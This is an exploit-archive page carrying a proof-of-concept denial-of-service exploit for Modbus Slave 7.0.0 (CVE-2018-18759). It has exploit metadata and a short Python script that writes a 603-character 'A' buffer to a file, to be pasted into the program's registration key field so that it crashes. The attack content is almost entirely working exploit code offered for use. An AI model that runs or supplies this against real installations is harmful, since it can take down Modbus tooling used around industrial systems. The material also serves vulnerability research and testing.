modbus slave 7.0.0 denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
# Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC) # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.modbustools.com/ # Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe # Software Link: https://www.modbustools.com/download/ModbusSlaveSetup64Bit.exe # Version: 7.0.0 # Category: Dos # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18759 # POC: # 1) # F3 & Connection / Connect / Registration Key #!/usr/bin/python buffer = "A" * 603 try: f=open("sie.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
Modbus slave 7.0.0 denial of service (poc) Vulnerability / Exploit Source : Modbus slave 7.0.0 denial of service (poc)